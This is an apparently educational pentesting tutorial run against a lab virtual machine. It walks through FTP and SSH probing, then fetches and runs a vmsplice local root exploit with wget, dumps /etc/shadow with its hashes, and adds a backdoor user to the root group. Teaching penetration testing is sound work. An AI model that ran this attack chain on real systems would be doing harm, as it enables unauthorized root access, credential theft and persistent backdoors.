Pentesting Tutorial Part 4 - Exploitation Part 1

Prerequisites: 

Backtrack, Metasploit, Ssh, Ftp

**Temp Save 1/1/2013**
In this tutorial we will continue on from last time and completely take over the server. Lets go over what we know so far. We have ftp, ssh, and a web server running. We have an anonymous account that could potentially give us access, and a vulnerability report. Lets begin.

First we are going to verify the anonymous ftp user account.

root@bt:~# ftp 192.168.1.14
Connected to 192.168.1.14.
220 Welcome to my FTP service.
Name (192.168.1.14:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

We do have access, now let’s see exactly what we can do.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Apr 04 2007 pub
226 Directory send OK.

Ok, we now that it dropped us in the standard pub directory, let’s see if we can grab the shadow file.

ftp> get /etc/shadow
local: ./etc/shadow remote: /etc/shadow
local: ./etc/shadow: No such file or directory

As you can see, it is telling us that the file does not exist. This is telling me that we have no access to do anything. Let’s verify.
ftp> cd /
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Apr 04 2007 pub
226 Directory send OK.
ftp> put /root/sx.txt sx.txt
local: /root/sx.txt remote: sx.txt
200 PORT command successful. Consider using PASV.
553 Could not create file.

Just as I suspected. We cannot create files, or even leave the pub directory for that matter. Let move on to the next port and vulnerability.

root@bt:~# ssh 192.168.1.14 -l anonymous
anonymous@192.168.1.14's password:
Last login: Tue Jul 3 23:24:27 2012 from 192.168.1.6
-bash-3.2$

Ok, so we have anonymous ssh access. What now? Let’s see what we have access to.
-bash-3.2$ ls
Permission denied
Ok, so our anonymous access is just a dummy account that cannot be used. Let’s try the web application. After examining the main page of the web application I can see that there is a login. What is the first thing that comes to any hackers mind when they see a login? Authentication Bypass! Let’s give it a go..
As you can see from the screenshots, this is a fedora server with a standard configuration. We do not have access to phpMyAdmin though. Ok, so we know a whole lot more than we did coming into this exercise. We have established write priviledges, the kernel version, the operating system, and that php is running. Lets write some files and see if we can get root access.

Now we are going to perform a quick google search for a local priv escalation exploit for the kernel. If we look around a bit, we will come across 2 exploits located here: http://www.securityfocus.com/bid/27704/exploit. We will copy the first exploit code and put it into a .c file. Then we will issue the following commands.

I saved the file as kernelLocalEsc.c so here is the command we will use

root@bt:~# gcc kernelLocalEsc.c -o kernelLocalEsc

Next we will transfer our file over to the server from a web server we have set up on our system. I have alredy set the web server up, I suggest you do the same if you are following along.
Since we know that we have write access to the html folder, we will go there and grab our exploit with the following commands.
-bash-3.2$ cd var/www/html
-bash-3.2$ wget http://192.168.1.9/kernelLocalEsc
--01:38:10-- http://192.168.1.9/kernelLocalEsc
=> `kernelLocalEsc'
Connecting to 192.168.1.9:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,261 (12K) [text/plain]

100%[====================================>] 12,261 --.--K/s

01:38:10 (535.96 KB/s) - `kernelLocalEsc' saved [12261/12261]

Next we will make it executable.

-bash-3.2$ chmod 755 kernelLocalEsc

Run It!

./kernelLocalEsc
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x14
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x4014
[+] page: 0x4000
[+] page: 0x4020

[root@localhost html]# whoami
root

Success!

Now we will pillage and plunder a bit. Lets grab the shadow file contents.

[root@localhost html]# cat /etc/shadow

root:$1$CA0AwLWv$XM/n/GFro6D.6.kRZF/9i.:15525:0:99999:7:::
bin:*:13967:0:99999:7:::
daemon:*:13967:0:99999:7:::
adm:*:13967:0:99999:7:::
lp:*:13967:0:99999:7:::
sync:*:13967:0:99999:7:::
shutdown:*:13967:0:99999:7:::
halt:*:13967:0:99999:7:::
mail:*:13967:0:99999:7:::
news:*:13967:0:99999:7:::
uucp:*:13967:0:99999:7:::
operator:*:13967:0:99999:7:::
games:*:13967:0:99999:7:::
gopher:*:13967:0:99999:7:::
ftp:*:13967:0:99999:7:::
nobody:*:13967:0:99999:7:::
rpm:!!:13967:0:99999:7:::
vcsa:!!:13967:0:99999:7:::
apache:!!:13967:0:99999:7:::
mailnull:!!:13967:0:99999:7:::
smmsp:!!:13967:0:99999:7:::
ntp:!!:13967:0:99999:7:::
nscd:!!:13967:0:99999:7:::
tcpdump:!!:13967:0:99999:7:::
dbus:!!:13967:0:99999:7:::
avahi:!!:13967:0:99999:7:::
hsqldb:!!:13967:0:99999:7:::
torrent:!!:13967:0:99999:7:::
sshd:!!:13967:0:99999:7:::
rpcuser:!!:13967:0:99999:7:::
nfsnobody:!!:13967:0:99999:7:::
haldaemon:!!:13967:0:99999:7:::
xfs:!!:13967:0:99999:7:::
gdm:!!:13967:0:99999:7:::
waxer:$1$CA0AwLWv$XM/n/GFro6D.6.kRZF/9i.:15525:0:99999:7:::
rpc:!!:13967:0:99999:7:::
mysql:!!:13967::::::
webalizer:!!:13967::::::
anonymous:$1$FptoY.6X$2pRGvk3pfXQohpnFol8jM.:15520:0:99999:7:::

Ok, as we can see the root password is the same as the user account. At this point I would usually start john the ripper, but I think I will leave that up to you, and I will make a backdoor user instead.

In this instance I had to locate the command, then added myself to the system.

[root@localhost /]# locate useradd
/etc/default/useradd
/usr/sbin/luseradd
/usr/sbin/useradd
/usr/share/man/fr/man8/useradd.8.gz
/usr/share/man/id/man8/useradd.8.gz
/usr/share/man/it/man8/useradd.8.gz
/usr/share/man/ja/man8/useradd.8.gz
/usr/share/man/man1/luseradd.1.gz
/usr/share/man/man8/useradd.8.gz
/usr/share/man/pl/man8/useradd.8.gz
/usr/share/man/ru/man8/useradd.8.gz
/usr/share/man/sv/man8/useradd.8.gz
/usr/share/man/tr/man8/useradd.8.gz
/usr/share/man/zh_CN/man8/useradd.8.gz
/usr/share/man/zh_TW/man8/useradd.8.gz
[root@localhost /]# /usr/sbin/useradd nu11by73

Now the password and rights.

[root@localhost /]# passwd nu11by73
Changing password for user nu11by73.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.
[root@localhost /]#/usr/sbin/usermod -a -G root nu11by73
[root@localhost /]# su nu11by73
[nu11by73@localhost /]$ id
uid=502(nu11by73) gid=502(nu11by73) groups=0(root),502(nu11by73)

Ok, I have added myself with a password the same as the username. I have added and verified I am in the root group. All is good! Lets see if I have ssh access.

root@bt:/# ssh 192.168.1.14 -l nu11by73
nu11by73@192.168.1.14's password:
[nu11by73@localhost ~]$

Sweet, we may need that later.. Now lets poke around a bit more and see if we are missing anything, and to drop a POC file.

root@localhost log]# dmesg | grep -i virtual
virtual kernel memory layout:
scsi 0:0:0:0: Direct-Access VMware, VMware Virtual S 1.0 PQ: 0 ANSI: 2

I always check to see if I am running in a virtual machine. In this instance, we are.

So to wrap up part 1, we have successfully exploited the server, obtained root access, grabbed that shadow file, added a backdoor user, and found that we are running in a virtual machine.

In part 2 I will show you how to escape the virtual environment. This tutorial was very basic. This was used just as an example.

Images: